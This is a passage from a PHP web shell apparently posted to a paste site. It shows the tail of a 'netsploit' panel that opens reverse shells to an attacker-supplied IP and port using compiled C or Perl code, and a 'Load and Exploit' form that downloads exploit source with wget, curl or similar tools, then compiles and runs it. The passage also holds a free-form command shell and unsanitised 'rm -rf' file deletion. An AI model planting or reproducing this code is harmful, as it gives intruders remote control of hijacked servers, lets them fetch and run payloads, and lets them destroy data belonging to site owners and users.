  3225.     elseif (isset($_POST['backconn']) && !empty($_POST['backport']) && !empty($_POST['ip']) && ($_POST['use'] == 'C'))
  3226.         {
  3227.         $ip = trim($_POST['ip']);
  3228.         $port = trim($_POST['backport']);
  3229.         tulis("bcc.c",$back_connect_c);
  3230.         exe("gcc -o bcc bcc.c");
  3231.         exe("chmod 777 bcc");
  3232.         @unlink("bcc.c");
  3233.         exe("./bcc ".$ip." ".$port." &");
  3234.         $msg = "Now script try connect to ".$ip." port ".$port." ...";
  3235.         }
  3236.     elseif (isset($_POST['backconn']) && !empty($_POST['backport']) && !empty($_POST['ip']) && ($_POST['use'] == 'Perl'))
  3237.         {
  3238.         $ip = trim($_POST['ip']);
  3239.         $port = trim($_POST['backport']);
  3240.         tulis_2("bcp",$back_connect);
  3241.         exe("chmod +x bcp");
  3242.         $p2=which("perl");
  3243.         exe($p2." bcp ".$ip." ".$port." &");
  3244.         sleep(1);
  3245.         $msg = "Now script try connect to ".$ip." port ".$port." ...";
  3246.         unlink("bcp");
  3247.         }
  3248.     elseif (isset($_POST['expcompile']) && !empty($_POST['wurl']) && !empty($_POST['wcmd']))
  3249.         {
  3250.         $pilihan = trim($_POST['pilihan']);
  3251.         $wurl = trim($_POST['wurl']);
  3252.         $namafile = download($pilihan,$wurl);
  3253.         if(is_file($namafile)) { $msg = exe($wcmd); } else $msg = "error: file not found $namafile"; }
  3254.     ?>
  3255.     <table class="tabnet">
  3256.         <tr>
  3257.             <th>Port Binding</th>
  3258.             <th>Connect Back</th>
  3259.             <th>Load and Exploit</th>
  3260.         </tr>
  3261.         <tr>
  3262.             <td>
  3263.                 <form method="post" actions="?y=<?php echo $pwd; ?>&amp;x=netsploit">
  3264.                 <table>
  3265.                     <tr>
  3266.                         <td>Port</td>
  3267.                         <td>
  3268.                         <input class="inputz" type="text" name="port" size="26" value="<?php echo $bindport ?>">
  3269.                         </td>
  3270.                     </tr>
  3271.                     <tr>
  3272.                         <td>Password</td>
  3273.                         <td><input class="inputz" type="text" name="bind_pass" size="26" value="<?php echo $bindport_pass; ?>"></td>
  3274.                     </tr>
  3275.                     <tr>
  3276.                         <td>Use</td>
  3277.                         <td style="text-align:justify">
  3278.                             <p>
  3279.                             <select class="inputz" size="1" name="use">
  3280.                                 <option value="Perl">Perl</option>
  3281.                                 <option value="C">C</option>
  3282.                             </select>
  3283.                             <input class="inputzbut" type="submit" name="bind" value="Bind !" style="width:120px">
  3284.                         </td>
  3285.                     </tr>
  3286.                 </table>
  3287.                 </form>
  3288.             </td>
  3289.             <td>
  3290.                 <form method="post" actions="?y=<?php echo $pwd; ?>&amp;x=netsploit">
  3291.                 <table>
  3292.                     <tr>
  3293.                         <td>IP</td>
  3294.                         <td>
  3295.                         <input class="inputz" type="text" name="ip" size="26" value="<?php echo ((getenv('REMOTE_ADDR')) ? (getenv('REMOTE_ADDR')) : ("127.0.0.1")); ?>">
  3296.                         </td>
  3297.                     </tr>
  3298.                     <tr>
  3299.                         <td>Port</td>
  3300.                         <td>
  3301.                         <input class="inputz" type="text" name="backport" size="26" value="<?php echo $bindport; ?>">
  3302.                         </td>
  3303.                     </tr>
  3304.                     <tr>
  3305.                         <td>Use</td>
  3306.                         <td style="text-align:justify">
  3307.                             <p>
  3308.                             <select size="1" class="inputz" name="use">
  3309.                                 <option value="Perl">Perl</option>
  3310.                                 <option value="C">C</option>
  3311.                             </select>
  3312.                             <input type="submit" name="backconn" value="Connect !" class="inputzbut" style="width:120px">
  3313.                         </td>
  3314.                     </tr>
  3315.                 </table>
  3316.                 </form>
  3317.             </td>
  3318.             <td>
  3319.                 <form method="post" actions="?y=<?php echo $pwd; ?>&amp;x=netsploit">
  3320.                 <table>
  3321.                     <tr>
  3322.                         <td>url</td>
  3323.                         <td><input class="inputz" type="text" name="wurl" style="width:250px;" value="www.some-code/exploits.c"></td>
  3324.                     </tr>
  3325.                     <tr>
  3326.                         <td>cmd</td>
  3327.                         <td><input class="inputz" type="text" name="wcmd" style="width:250px;" value="gcc -o exploits exploits.c;chmod +x exploits;./exploits;"></td>
  3328.                     </tr>
  3329.                     <tr>
  3330.                         <td>
  3331.                         <select size="1" class="inputz" name="pilihan">
  3332.                             <option value="wwget">wget</option>
  3333.                             <option value="wlynx">lynx</option>
  3334.                             <option value="wfread">fread</option>
  3335.                             <option value="wfetch">fetch</option>
  3336.                             <option value="wlinks">links</option>
  3337.                             <option value="wget">GET</option>
  3338.                             <option value="wcurl">curl</option>
  3339.                         </select>
  3340.                         </td>
  3341.                         <td colspan="2">
  3342.                             <input type="submit" name="expcompile" class="inputzbut" value="Go !" style="width:246px;">
  3343.                         </td>
  3344.                     </tr>
  3345.                 </table>
  3346.                 </form>
  3347.             </td>
  3348.         </tr>
  3349.     </table>
  3350.     <div style="text-align:center;margin:2px;"><?php echo $msg; ?></div>
  3351. <?php }
  3352.  
  3353. elseif(isset($_GET['x']) && ($_GET['x'] == 'shell'))
  3354.     {
  3355.     ?>
  3356.     <form action="?y=<?php echo $pwd; ?>&amp;x=shell" method="post">
  3357.         <table class="cmdbox">
  3358.             <tr>
  3359.                 <td colspan="2">
  3360.                 <textarea class="output" readonly> <?php if(isset($_POST['submitcmd'])) { echo @exe($_POST['cmd']); } ?> </textarea>
  3361.                 </td>
  3362.             </tr>
  3363.             <tr>
  3364.                 <td colspan="2"><?php echo $prompt; ?>
  3365.                 <input onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="cmd" style="width:60%;" value="" />
  3366.                 <input class="inputzbut" type="submit" value="Go !" name="submitcmd" style="width:12%;" />
  3367.                 </td>
  3368.             </tr>
  3369.         </table>
  3370.     </form> <?php
  3371.     }
  3372. else
  3373.     {
  3374.     if(isset($_GET['delete']) && ($_GET['delete'] != ""))
  3375.         {
  3376.         $file = $_GET['delete']; @unlink($file);
  3377.         }
  3378.     elseif(isset($_GET['fdelete']) && ($_GET['fdelete'] != ""))
  3379.         {
  3380.         @exe('rm -rf '.$_GET['fdelete'].'');
  3381.         }
  3382.     elseif(isset($_GET['mkdir']) && ($_GET['mkdir'] != ""))
  3383.         {
  3384.         $path = $pwd.$_GET['mkdir']; @mkdir($path);
  3385.         }
  3386.     $buff = showdir($pwd,$prompt);
  3387.     echo $buff;
  3388.     }
  3389.     ?>
  3390.    
  3391.         </div>
  3392.     </body>
  3393. </html>
Add Comment
Please, Sign In to add comment